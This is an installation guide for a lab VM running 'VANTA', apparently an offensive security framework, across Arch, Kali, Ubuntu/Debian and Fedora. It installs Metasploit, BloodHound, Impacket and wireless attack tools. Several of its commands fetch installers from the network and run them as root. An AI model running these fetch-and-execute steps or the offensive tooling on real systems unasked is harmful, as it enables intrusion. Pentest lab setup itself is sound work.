Arch is the primary VANTA development platform. CachyOS (a real-time kernel Arch fork) is what the core team runs. This is the most involved install but gives you the most control.

Download the ISO from archlinux.org/download. Verify the SHA256 checksum before booting. Create the VM with the specs above, attach the ISO, enable UEFI, set network to Bridged, and boot.

01
Verify boot and internet
loadkeys us to set keyboard layout. Then ping -c3 archlinux.org — this must succeed before continuing. If it fails, check the VM network adapter is set to Bridged.
02
Sync clock and partition
timedatectl set-ntp true then fdisk /dev/vda (QEMU) or /dev/sda (VirtualBox). Inside fdisk: g → GPT table · n → partition 1 +512M → type EFI System (t 1) · n → partition 2 default → Linux filesystem · w → write.
03
Format and mount
mkfs.fat -F32 /dev/vda1 · mkfs.ext4 /dev/vda2 · mount /dev/vda2 /mnt · mkdir -p /mnt/boot/efi · mount /dev/vda1 /mnt/boot/efi
04
Install base system and generate fstab
pacstrap /mnt base linux linux-firmware base-devel sudo nano — takes a few minutes depending on connection speed. Then genfstab -U /mnt >> /mnt/etc/fstab and arch-chroot /mnt to enter the new system.
05
Configure time zone, locale, and hostname
ln -sf /usr/share/zoneinfo/Region/City /etc/localtime · hwclock --systohc · add en_US.UTF-8 UTF-8 to /etc/locale.gen then locale-gen · echo "LANG=en_US.UTF-8" > /etc/locale.conf · echo "vanta-arch" > /etc/hostname
06
Create user with correct groups
passwd (set root password) · useradd -m -G wheel,plugdev,audio,video,storage -s /bin/bash yourname · passwd yourname · EDITOR=nano visudo → uncomment %wheel ALL=(ALL:ALL) ALL. The plugdev group is required for ADB USB access.
07
Install GRUB and enable networking
pacman -S grub efibootmgr networkmanager · grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=GRUB · grub-mkconfig -o /boot/grub/grub.cfg · systemctl enable NetworkManager
08
Exit, unmount, and reboot
exit (leaves chroot) · umount -R /mnt · reboot. Remove the ISO from the virtual optical drive before the VM restarts — otherwise it will boot the installer again instead of the new system.
09
Post-reboot: install all VANTA dependencies
Log in as your user, then run the single-line install command below. This covers every dependency for all VANTA modules.
sudo pacman -Syu
sudo pacman -S go python python-pip git nmap masscan android-tools \
               apktool default-jdk metasploit bore jq nodejs \
               aircrack-ng iw wireless_tools imagemagick ffmpeg \
               frida python-requests python-ldap3 python-scapy \
               python-paramiko netexec bloodhound impacket

# MSF database — one time only
sudo msfdb init
msfconsole -q -x "version; exit"

# ADB USB permissions
sudo tee /etc/udev/rules.d/51-android.rules <<'EOF'
SUBSYSTEM=="usb", ATTR{idVendor}=="18d1", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="04e8", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="0bb4", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="22b8", MODE="0666", GROUP="plugdev"
EOF
sudo udevadm control --reload-rules && sudo udevadm trigger

# Clone and install VANTA
git clone https://github.com/0xb0rn3/vanta && cd VANTA
bash install.sh
./vanta --version && ./vanta -check-deps

Kali Linux

Kali ships most offensive tools pre-installed, making it the fastest path to a working VANTA lab. The only manual fix required is replacing the outdated packaged Go — Kali frequently ships 1.18 or older, and VANTA requires 1.21+.

Download from kali.org/get-kali → Installer Images → Kali Linux 64-Bit (Installer). Create the VM with the standard specs, attach the ISO, and boot.

01
Graphical installer — step by step
Select Graphical Install · Language: English · Location: your country · Keyboard: English (US) · Hostname: vanta-kali · Domain: leave blank · create a username and password · Partitioning: Guided — use entire disk, all files in one partition · Software: leave defaults ticked · install GRUB to the primary drive · Finish → reboot → remove ISO.
02
Replace system Go with upstream 1.21+
Kali's golang-go package is often 1.18 or older. Download the official Go 1.21 binary, extract to /usr/local/go, and add it to PATH. The commands are in the block below.
03
Install bore and init MSF database
Bore is not in the Kali apt repos — download the pre-built binary. Metasploit is pre-installed but the PostgreSQL database must be initialised once with sudo msfdb init.
04
Clone and install VANTA
bash install.sh detects apt, installs any remaining deps, compiles the binary, writes the ADB udev rule, and runs the dependency verification table.
sudo apt update && sudo apt full-upgrade -y

# Replace outdated Go
wget -q https://go.dev/dl/go1.21.13.linux-amd64.tar.gz
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf go1.21.13.linux-amd64.tar.gz
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc && source ~/.bashrc
go version   # must print go1.21.x or higher

# Bore — not in apt
curl -L https://github.com/ekzhang/bore/releases/latest/download/bore-x86_64-unknown-linux-musl.tar.gz \
  | tar xz && sudo mv bore /usr/local/bin/

# MSF database initialisation (Kali ships MSF pre-installed)
sudo msfdb init
msfconsole -q -x "version; exit"

# Clone and install VANTA
git clone https://github.com/0xb0rn3/vanta && cd VANTA
bash install.sh
./vanta --version && ./vanta -check-deps

Ubuntu / Debian

Ubuntu 24.04 LTS and Debian 12 Bookworm are both supported. Neither ships MSF or offensive tools by default — they must be installed manually. Both also package an outdated Go that must be replaced with the upstream binary.

Downloads: Ubuntu 24.04 LTS from ubuntu.com/download/server (server ISO is lighter) · Debian 12 from debian.org/distrib/netinst.

01
Installer — Ubuntu
Boot ISO → guided install → set hostname vanta-ubuntu · create a user · disk: Erase disk and install (entire disk, one partition) · do not enable LVM unless you know you need it · GRUB to primary drive · reboot, remove ISO.
01
Installer — Debian
Boot ISO → Graphical Install → language, keyboard, hostname vanta-debian · root password · create user · partitioning: Guided — entire disk, all files in one partition · software selection: untick desktop environment, keep SSH server and standard utilities for a headless pentest box · GRUB to primary drive → reboot, remove ISO.
02
Replace system Go and install deps
Ubuntu ships Go 1.21+ from Ubuntu 24.04 onwards — verify with go version before downloading. Debian 12 ships 1.19 — always replace. Use the Rapid7 MSF installer since MSF is not in apt.
sudo apt update && sudo apt full-upgrade -y

# Replace Go if version is below 1.21
go version   # check first — Ubuntu 24.04 may already be 1.21+
wget -q https://go.dev/dl/go1.21.13.linux-amd64.tar.gz
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf go1.21.13.linux-amd64.tar.gz
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc && source ~/.bashrc

# System packages
sudo apt install -y python3 python3-pip git nmap masscan adb apktool \
                    default-jdk jq nodejs aircrack-ng iw wireless-tools \
                    imagemagick ffmpeg smbclient

# Metasploit — Rapid7 official installer
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \
  > msfinstall && chmod 755 msfinstall && sudo ./msfinstall
sudo msfdb init

# Python packages
pip3 install requests ldap3 scapy paramiko impacket frida-tools bloodhound \
             --break-system-packages

# Bore
curl -L https://github.com/ekzhang/bore/releases/latest/download/bore-x86_64-unknown-linux-musl.tar.gz \
  | tar xz && sudo mv bore /usr/local/bin/

# Clone and install VANTA
git clone https://github.com/0xb0rn3/vanta && cd VANTA
bash install.sh
./vanta --version && ./vanta -check-deps

Fedora

Fedora 40+ ships a sufficiently modern Go in its official dnf repos — no manual replacement needed. Metasploit and apktool are not in the Fedora repos and require separate installation.

Download from fedoraproject.org/workstation — Fedora Workstation 40 ISO. For a headless pentest box, use the Server ISO instead.

01
Anaconda graphical installer
Boot ISO → Install to Hard Drive · Language: English · Installation Summary: set Installation Destination (automatic partitioning on your disk) · Network & Hostname: enable wired, hostname vanta-fedora · Root Account: enable + set password · User Creation: create user, tick Make this user administrator · Begin Installation → reboot → remove ISO.
02
Install apktool manually
apktool is not in the Fedora repos. Download the wrapper script and the JAR from the official GitHub release, place both in /usr/local/bin/, and chmod the wrapper. The commands are in the block below.
03
Install Metasploit via Rapid7 installer
Metasploit is not in the Fedora dnf repos. The official Rapid7 installer handles it as a self-contained Ruby omnibus package. Run the installer script as root, then sudo msfdb init.
sudo dnf update -y

# Core deps — Go is current in Fedora repos
sudo dnf install -y golang python3 python3-pip git nmap jq nodejs \
                    aircrack-ng iw android-tools imagemagick ffmpeg

# apktool — not in Fedora repos, install manually
wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool
wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
sudo mv apktool /usr/local/bin/ && sudo mv apktool_*.jar /usr/local/bin/apktool.jar
sudo chmod +x /usr/local/bin/apktool

# Metasploit — Rapid7 official installer
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \
  > msfinstall && chmod 755 msfinstall && sudo ./msfinstall
sudo msfdb init

# Python packages
pip3 install requests ldap3 scapy paramiko impacket frida-tools

# Bore
curl -L https://github.com/ekzhang/bore/releases/latest/download/bore-x86_64-unknown-linux-musl.tar.gz \
  | tar xz && sudo mv bore /usr/local/bin/

# ADB udev rule
sudo tee /etc/udev/rules.d/51-android.rules <<'EOF'
SUBSYSTEM=="usb", ATTR{idVendor}=="18d1", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="04e8", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="0bb4", MODE="0666", GROUP="plugdev"
EOF
sudo udevadm control --reload-rules && sudo udevadm trigger
sudo usermod -aG plugdev $USER

# Clone and install VANTA
git clone https://github.com/0xb0rn3/vanta && cd VANTA
bash install.sh
./vanta --version && ./vanta -check-deps
Snapshot immediately after VANTA installs cleanly. In QEMU/KVM: virsh snapshot-create-as vanta-arch clean-install. In VirtualBox: Machine → Take Snapshot → "clean-install". Roll back to this snapshot before each new engagement to start from a known-good state.